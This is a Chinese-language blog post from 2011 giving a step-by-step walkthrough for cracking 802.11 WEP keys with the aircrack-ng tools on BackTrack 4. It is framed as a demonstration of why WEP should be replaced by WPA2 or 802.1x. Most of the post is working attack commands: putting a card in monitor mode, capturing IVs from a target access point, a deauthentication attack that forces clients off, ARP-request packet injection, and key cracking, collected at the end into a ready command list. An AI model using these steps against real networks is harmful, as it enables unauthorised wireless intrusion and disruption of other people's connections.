2011年11月22日 星期二

破解802.11 WEP金鑰

近年來,無線區域網路802.11的廣泛使用,使得其安全性越來越受重視並日益嚴重,而自從1997年IEEE制定了飽受批評的第一代無線區域網路安全性標準WEP協定後,至今也已過了十多個年頭,作者卻發現市面上仍然廣泛使用WEP這個有嚴重安全性瑕疵的WEP,其實除非您仍使用老舊的無線網卡或基地台,否則十多年來,無線區域網路早已發展出較高安全性的安全性協定,而目前可應用在WLAN的安全性協定或規格發展歷程如下圖所示:
wifisecurity

企業組織使用無線區域網路時應採用802.1x協定以密碼或憑證方式來支援無線網路的安全性,而一般個人或小型網路環境亦應捨棄WEP,而改使用WPA2安全性機制。
以今日強大且隨手可得的破解工具,只要攔截到足夠數量的IV封包即可破解WEP金鑰,底下簡單說明WEP破解的簡易過程與步驟,以驗證為何傳統的WEP絕不該再被使用。

破解前準備作業


硬體 無線網卡要能夠支援監視模式(monitor mode)
監視模式為無線網路特有的運作模式,允許無線卡不需要預先結合(associate)至基地台的情況下就可以接收所有的無線網路流量。
軟體 airodump – 抓取 IV (Grabbing IVs )
airreplay – 將封包注入攻擊的基地台( Packet injector to attack APs)
aircrack – 破解IV (Cracking the IVs )找出WEP金鑰
※ 直接使用BackTrack 4開機光碟,另外再加上一個空間夠大儲放攔截封包檔案的行動碟即可

步驟一:搜查攻擊目標的資訊

•加密類型 (WEP、WPA、WPA2 ? )
•使用的頻道(Channel)
•訊號強度
•BSSID:每個無線裝置的唯一識別碼,通常 就是該裝置的乙太網路 MAC 位址
•ESSID

步驟二:設定網卡為監控模式並啟動網卡


# iwconfig wlan0 mode monitor (設定監控模式)
# ifconfig wlan0 up (啟動網卡)

步驟三:攔截取得IVs

# airodump-ng -i -w capture -c 5  --bssid 000bace7aeec  wlan0


    i :只攔截IVs封包
   W:將攔截到的封包寫入capturexx.ivs 檔
   c:AP使用的頻道
   bssid: AP使用的BSSID (Mac Addr)
   wlan0:無線網卡名稱
若使用back Track光碟開機,則您需要插入行動碟並成功掛載之,再進入此掛載目錄後才能執行上述指令以便可以儲存capturexx.ivs檔案  
#mkdir /usb1
#mount –t ntfs /dev/sdb1 /usb1 –o force

步驟四:注入封包以取得IV值

為了快速收集到足夠數目的IV封包,所以您需要使用aireplay-ng注入封包以增加IV值
  • 若等不到封包請執行Deauthentication攻擊指令(強迫斷線並重連)
    # aireplay-ng -0 10 -a 000bace7aeec -c 001e647a85dc wlan0
    (前面為AP的MAC位址,後面為本身網卡的MAC位址)
  • 注入ARP Request封包:
    # aireplay-ng -3 -b 000bace7aeec -h 001e647a85dc wlan0
    (前面為AP的MAC位址,後面為本身網卡的MAC位址)

步驟五:利用IVs破解WEP Key

•只要收集足夠數量的IVs數,就可以執行下列指令進行破解:
       #aircrack-ng capture*.ivs
•按經驗與運氣而言,您可能需要收集20000~200000個IVs才能破解64位元的WEP 金鑰
•若無法破解則需要繼續收集之 (要有一點耐心)
wifisecurity2

使用破解WEP Key結合失敗可能原因及處理


破解不順利有可能是底下的原因:
  • 基地台可能隱藏SSID並且已啟用網卡篩選功能
  • 您需要在步驟三的airodump-ng畫面中找出合格的網卡卡號和未廣播的SSID
         -  需耐心等待有合格使用者正在使用此基地台
wifisecurity3

破解WEP Key 指令整理

最後,整理本文示範中破解WEP金鑰所使用的指令如下:
1. iwconfig wlan0 mode monitor
2. ifconfig wlan0 up
3. airodump-ng -i -w capture -c 5 --bssid 000bace7aeec wlan0
4. aireplay-ng -0 10 -a 000bace7aeec -c 001e647a85dc wlan0
5. aireplay-ng -3 -b 000bace7aeec -h 001e647a85dc wlan0
6. aircrack-ng capture*.ivs